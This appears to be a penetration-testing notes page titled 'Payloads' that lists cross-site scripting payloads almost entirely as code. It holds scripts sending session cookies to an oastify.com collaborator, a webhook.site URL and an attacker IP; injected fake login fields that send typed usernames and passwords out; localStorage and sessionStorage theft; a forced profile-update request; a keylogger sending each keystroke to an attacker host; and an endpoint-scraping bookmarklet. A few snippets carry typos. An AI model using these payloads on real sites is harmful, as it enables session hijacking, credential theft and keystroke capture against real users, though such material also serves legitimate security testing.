Payloads
Last updated
Was this helpful?
Last updated
Was this helpful?
(OWASP)
In modern HTML (HTML5), the / at the end of a self-closing tag is optional, but in XHTML is required.
<img src="http://localhost?c='+document.cookie+'" />fetch("http://localhost?c="+document.cookie);// collaborator payload
<script>
fetch('https://705jjd45qk9l1pb4rhns097xgomfa5yu.oastify.com',
{
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script><script>var i = new Image; i.src="https://webhook.site/094ef770-e736-4b31-a3cb-34be690ff1b9/?"+document.cookie</script>// save the value of the cookie in a variable
let cookie = document.cookie
// URL-encode the variable
let encodedCookie = encodeURIComponent(cookie)
// make a GET request to our attacker machine exfiltrating the cookie
fetch("http://192.168.45.214/exfil?data=" + encodedCookie)// create the input elements
let usernameField = document.createElement("input")
usernameField.type = "text"
usernameField.name = "username"
usernameField.id = "username"
let passwordField = document.createElement("input")
passwordField.type = "password"
passwordField.name = "password"
passwordField.id = "password"
// append the elements to the body of the page
document.body.appendChild(usernameField)
document.body.appendChild(passwordField)
// exfiltrate as needed (we need to wait for the fields to be filled before exfiltrating the information)
setTimeout(function() {
console.log("Username:", document.getElementById("username").value)
console.log("Password:", document.getElementById("password").value)
}, 1000);// save the body of the document into a var
let body = document.getElementsByTagName("body")[0]
// create the username element
var u = document.createElement("input");
u.type = "text";
u.style.position = "fixed";
//u.style.opacity = "0";
// create the password element
var p = document.createElement("input");
p.type = "password";
u.style.position = "fixed";
//u.style.opacity = "0";
// append elements to the body
body.append(u)
body.append(p)
// set a GET request after a 5 second timeout
setTimeout(function(){
fetch("http://192.168.45.214/k?u=" + u.value + "&p=" + p.value)
}, 5000);let data = JSON.stringify(localStorage)
let encodedData - encodeURIComponent(data)
fetch("http://<attackerIP>/exfil?data=" + encodedData)let data = JSON.stringify(sessionStorage)
let encodedData - encodeURIComponent(data)
fetch("http://<attackerIP>/exfil?data=" + encodedData)let xhr = new XMLHttpRequest();
xhr.open('POST','http://localhost/updateprofile',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('email=updated@email.com’);document.onkeypress = function(e) {
get = window.event ? event : e
key = get.keyCode ? get.keyCode : get.charCode
key = String.fromCharCode(key)
console.log(key)
}function logKey(event){
fetch("http://192.168.45.214/k?key=" + event.key)
}
// for each keypress, execute the callback function
document.addEventListener('keydown', logKey);fetch('http://localhost/endpoint’)<img src='http://localhost/file' />
<img src='x' onerror='http://localhost/file' />
<img src="x" onerror="window.location.href='http://localhost/file'"><script src='http://localhost/file'></script>javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const%20results=new%20Set;for(var%20i=0;i<scripts.length;i++){var%20t=scripts[i].src;""!=t&&fetch(t).then(function(t){return%20t.text()}).then(function(t){var%20e=t.matchAll(regex);for(let%20r%20of%20e)results.add(r[0])}).catch(function(t){console.log("An%20error%20occurred:%20",t)})}var%20pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const%20match%20of%20matches)results.add(match[0]);function%20writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();